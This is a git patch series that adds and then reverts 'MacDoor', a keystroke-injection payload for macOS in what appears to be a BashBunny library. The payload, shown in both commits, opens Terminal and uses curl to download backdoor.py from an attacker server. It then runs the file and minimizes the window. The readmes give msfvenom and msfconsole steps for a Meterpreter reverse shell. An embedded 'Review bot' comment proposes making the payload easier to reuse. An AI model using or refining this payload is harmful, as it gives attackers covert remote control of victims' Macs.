From 5ec93761fda8d3b75feff5aee09eaf47aad7220f Mon Sep 17 00:00:00 2001
From: afsh4ck <132138425+afsh4ck@users.noreply.github.com>
Date: Thu, 31 Aug 2023 00:39:59 +0200
Subject: [PATCH 1/2] Create MacDoor - A Python Backdoor for MacOS (#662)
* Add files via upload
* Update readme.md
* Add files via upload
* Update readme.md
* Update payload.txt
---
 .../library/execution/MacDoor/payload.txt | 47 +++++++++++++++++++
 payloads/library/execution/MacDoor/readme.md | 30 ++++++++++++
 .../library/remote_access/MacDoor/payload.txt | 47 +++++++++++++++++++
 .../library/remote_access/MacDoor/readme.md | 30 ++++++++++++
 4 files changed, 154 insertions(+)
 create mode 100644 payloads/library/execution/MacDoor/payload.txt
 create mode 100644 payloads/library/execution/MacDoor/readme.md
 create mode 100644 payloads/library/remote_access/MacDoor/payload.txt
 create mode 100644 payloads/library/remote_access/MacDoor/readme.md
diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt
new file mode 100644
index 00000000..4c5038fc
--- /dev/null
+++ b/payloads/library/execution/MacDoor/payload.txt
@@ -0,0 +1,47 @@
+#!/bin/bash
+#
+# Title: MacDoor
+# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
+# Author: afsh4ck
+# Version: 1.0
+# Target: MacOS
+# Category: Execution
+#
+# Steps:
+# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
+# Step 2: mount a local server 'python3 -m http.server'
+# Step 3: msfconsole multi/handler listener open before the attack.
+#
+# Note:
+# You need to modify the script with your attacker IP and the port or your local server.
+#
+# Purple.............Setup
+# Yellow blink.......Attack Mode ON
+# Green..............Finish
+
+LED SETUP
+ATTACKMODE HID STORAGE ECM_ETHERNET
+LED ATTACK
+
+# Open terminal
+QUACK GUI SPACE
+QUACK DELAY 500
+QUACK STRING Terminal
+QUACK ENTER
+QUACK DELAY 3000
+
+# Execute attack
+QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd Downloads
+QUACK ENTER
+QUACK STRING python3 backdoor.py
+QUACK ENTER
+
+# Minimize terminal
+QUACK GUI m
+QUACK DELAY 2000
+
+# Standby
+LED FINISH
diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md
new file mode 100644
index 00000000..5e82e9cc
--- /dev/null
+++ b/payloads/library/execution/MacDoor/readme.md
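Review bot: The download line `QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py` hard-codes one specific LAN address even though the header's Note says the user must edit it, and Step 1 in the same header already spells that value as the `{your IP}` placeholder; writing the curl line as `QUACK STRING curl http://{your IP}:8000/backdoor.py -o Downloads/backdoor.py` keeps the file self-consistent and avoids shipping a stale address that silently fails for anyone who skips the Note. The `payloads/library/remote_access/MacDoor/payload.txt` hunk later in this patch is a copy of this one differing only in its `# Category:` line, so any correction has to be made twice; keeping one copy and pointing to it from the other category would be easier to maintain. The Description line's "from our server" reads, in a shared payload library, as if the project hosts the file; "from a server you control" would say what the Note actually means.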
@@ -0,0 +1,30 @@
+# MacDoor - Python Backdoor Execution for the BashBunny
+
+```
+ __ ___ ____
+ / |/ /____ _ _____ / __ \ ____ ____ _____
+ / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
+ / / / // /_/ // /__ / /_/ // /_/ // /_/ // /
+/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
+```
+
+* Author: afsh4ck
+* Version: 1.0
+* Target: MacOS
+* Tested on: Ventura 13.3.1
+* Category: Execution
+
+# DESCRIPTION
+
+Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
+
+# STEPS
+
+* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
+* Step 2: mount a local server 'python3 -m http.server'
+* Step 3: msfconsole multi/handler listener open before the attack.
+
+# NOTE
+
+* You need to modify the script with your attacker IP and the port or your local server.
+
diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt
new file mode 100644
index 00000000..3ed7bfc7
--- /dev/null
+++ b/payloads/library/remote_access/MacDoor/payload.txt
@@ -0,0 +1,47 @@
+#!/bin/bash
+#
+# Title: MacDoor
+# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
+# Author: afsh4ck
+# Version: 1.0
+# Target: MacOS
+# Category: Remote Access
+#
+# Steps:
+# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
+# Step 2: mount a local server 'python3 -m http.server'
+# Step 3: msfconsole multi/handler listener open before the attack.
+#
+# Note:
+# You need to modify the script with your attacker IP and the port or your local server.
+#
+# Purple.............Setup
+# Yellow blink.......Attack Mode ON
+# Green..............Finish
+
+LED SETUP
+ATTACKMODE HID STORAGE ECM_ETHERNET
+LED ATTACK
+
+# Open terminal
+QUACK GUI SPACE
+QUACK DELAY 500
+QUACK STRING Terminal
+QUACK ENTER
+QUACK DELAY 3000
+
+# Execute attack
+QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd Downloads
+QUACK ENTER
+QUACK STRING python3 backdoor.py
+QUACK ENTER
+
+# Minimize terminal
+QUACK GUI m
+QUACK DELAY 2000
+
+# Standby
+LED FINISH
diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md
new file mode 100644
index 00000000..7fd07093
--- /dev/null
+++ b/payloads/library/remote_access/MacDoor/readme.md
@@ -0,0 +1,30 @@
+# MacDoor - Python Backdoor Execution for MacOS
+
+```
+ __ ___ ____
+ / |/ /____ _ _____ / __ \ ____ ____ _____
+ / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
+ / / / // /_/ // /__ / /_/ // /_/ // /_/ // /
+/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
+```
+
+* Author: afsh4ck
+* Version: 1.0
+* Target: MacOS
+* Tested on: Ventura 13.3.1
+* Category: Remote Access
+
+# DESCRIPTION
+
+Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
+
+# STEPS
+
+* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
+* Step 2: mount a local server 'python3 -m http.server'
+* Step 3: msfconsole multi/handler listener open before the attack.
+
+# NOTE
+
+* You need to modify the script with your attacker IP and the port or your local server.
+
From f729050548f28ca7a307fdaac31c3b846c593341 Mon Sep 17 00:00:00 2001
From: Dallas Winger <9642419+dallaswinger@users.noreply.github.com>
Date: Mon, 18 Sep 2023 12:50:10 -0400
Subject: [PATCH 2/2] Revert "Create MacDoor - A Python Backdoor for MacOS (#662)"
This reverts commit 5ec93761fda8d3b75feff5aee09eaf47aad7220f.
---
 .../library/execution/MacDoor/payload.txt | 47 -------------------
 payloads/library/execution/MacDoor/readme.md | 30 ------------
 .../library/remote_access/MacDoor/payload.txt | 47 -------------------
 .../library/remote_access/MacDoor/readme.md | 30 ------------
 4 files changed, 154 deletions(-)
 delete mode 100644 payloads/library/execution/MacDoor/payload.txt
 delete mode 100644 payloads/library/execution/MacDoor/readme.md
 delete mode 100644 payloads/library/remote_access/MacDoor/payload.txt
 delete mode 100644 payloads/library/remote_access/MacDoor/readme.md
diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt
deleted file mode 100644
index 4c5038fc..00000000
--- a/payloads/library/execution/MacDoor/payload.txt
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/bin/bash
-#
-# Title: MacDoor
-# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
-# Author: afsh4ck
-# Version: 1.0
-# Target: MacOS
-# Category: Execution
-#
-# Steps:
-# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
-# Step 2: mount a local server 'python3 -m http.server'
-# Step 3: msfconsole multi/handler listener open before the attack.
-#
-# Note:
-# You need to modify the script with your attacker IP and the port or your local server.
-#
-# Purple.............Setup
-# Yellow blink.......Attack Mode ON
-# Green..............Finish
-
-LED SETUP
-ATTACKMODE HID STORAGE ECM_ETHERNET
-LED ATTACK
-
-# Open terminal
-QUACK GUI SPACE
-QUACK DELAY 500
-QUACK STRING Terminal
-QUACK ENTER
-QUACK DELAY 3000
-
-# Execute attack
-QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
-QUACK ENTER
-QUACK DELAY 1000
-QUACK STRING cd Downloads
-QUACK ENTER
-QUACK STRING python3 backdoor.py
-QUACK ENTER
-
-# Minimize terminal
-QUACK GUI m
-QUACK DELAY 2000
-
-# Standby
-LED FINISH
diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md
deleted file mode 100644
index 5e82e9cc..00000000
--- a/payloads/library/execution/MacDoor/readme.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# MacDoor - Python Backdoor Execution for the BashBunny
-
-```
- __ ___ ____
- / |/ /____ _ _____ / __ \ ____ ____ _____
- / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
- / / / // /_/ // /__ / /_/ // /_/ // /_/ // /
-/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
-```
-
-* Author: afsh4ck
-* Version: 1.0
-* Target: MacOS
-* Tested on: Ventura 13.3.1
-* Category: Execution
-
-# DESCRIPTION
-
-Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
-
-# STEPS
-
-* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
-* Step 2: mount a local server 'python3 -m http.server'
-* Step 3: msfconsole multi/handler listener open before the attack.
-
-# NOTE
-
-* You need to modify the script with your attacker IP and the port or your local server.
-
diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt
deleted file mode 100644
index 3ed7bfc7..00000000
--- a/payloads/library/remote_access/MacDoor/payload.txt
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/bin/bash
-#
-# Title: MacDoor
-# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
-# Author: afsh4ck
-# Version: 1.0
-# Target: MacOS
-# Category: Remote Access
-#
-# Steps:
-# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
-# Step 2: mount a local server 'python3 -m http.server'
-# Step 3: msfconsole multi/handler listener open before the attack.
-#
-# Note:
-# You need to modify the script with your attacker IP and the port or your local server.
-#
-# Purple.............Setup
-# Yellow blink.......Attack Mode ON
-# Green..............Finish
-
-LED SETUP
-ATTACKMODE HID STORAGE ECM_ETHERNET
-LED ATTACK
-
-# Open terminal
-QUACK GUI SPACE
-QUACK DELAY 500
-QUACK STRING Terminal
-QUACK ENTER
-QUACK DELAY 3000
-
-# Execute attack
-QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
-QUACK ENTER
-QUACK DELAY 1000
-QUACK STRING cd Downloads
-QUACK ENTER
-QUACK STRING python3 backdoor.py
-QUACK ENTER
-
-# Minimize terminal
-QUACK GUI m
-QUACK DELAY 2000
-
-# Standby
-LED FINISH
diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md
deleted file mode 100644
index 7fd07093..00000000
--- a/payloads/library/remote_access/MacDoor/readme.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# MacDoor - Python Backdoor Execution for MacOS
-
-```
- __ ___ ____
- / |/ /____ _ _____ / __ \ ____ ____ _____
- / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
- / / / // /_/ // /__ / /_/ // /_/ // /_/ // /
-/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
-```
-
-* Author: afsh4ck
-* Version: 1.0
-* Target: MacOS
-* Tested on: Ventura 13.3.1
-* Category: Remote Access
-
-# DESCRIPTION
-
-Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
-
-# STEPS
-
-* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
-* Step 2: mount a local server 'python3 -m http.server'
-* Step 3: msfconsole multi/handler listener open before the attack.
-
-# NOTE
-
-* You need to modify the script with your attacker IP and the port or your local server.
-